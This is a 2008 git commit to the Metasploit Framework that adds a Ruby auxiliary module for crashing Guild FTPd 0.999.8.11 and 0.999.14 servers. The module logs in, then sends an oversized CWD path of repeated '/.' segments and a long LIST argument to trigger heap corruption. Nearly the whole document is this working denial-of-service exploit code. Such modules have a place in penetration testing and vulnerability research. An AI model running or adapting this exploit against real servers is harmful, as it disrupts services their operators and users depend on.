Added patch and module from Kris Katterjohn

git-svn-id: file:///home/svn/framework3/trunk@5752 4d416f70-5f16-0410-b530-b9f4589650da
2008-10-14 14:25:41 +00:00 · 2008-10-14 14:25:41 +00:00 · 86148b4802
parent 8d760ebc1e
commit 86148b4802
1 changed files with 41 additions and 0 deletions
--- a/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb
+++ b/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb
@ -0,0 +1,41 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',
+			'Description'    => %q{
+				Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable
+				to heap corruption.  You need to have a valid login
+				so you can run CWD and LIST.
+			},
+			'Author'         => 'Kris Katterjohn <katterjohn@gmail.com>',
+			'License'        => MSF_LICENSE,
+			'Version'        => '1',
+			'References'     =>
+				[ [ 'URL', 'http://milw0rm.com/exploits/6738'] ],
+			'DisclosureDate' => 'Oct 12 2008'))
+
+		# They're required
+		register_options([
+			OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
+			OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
+		])
+	end
+
+	def run
+		connect_login
+
+		print_status("Sending commands...")
+
+		# We want to try to wait for responses to these
+		raw_send_recv("CWD #{'/.' * 124}\r\n")
+		raw_send_recv("LIST #{'X' * 100}\r\n")
+
+		disconnect
+	end
+end
+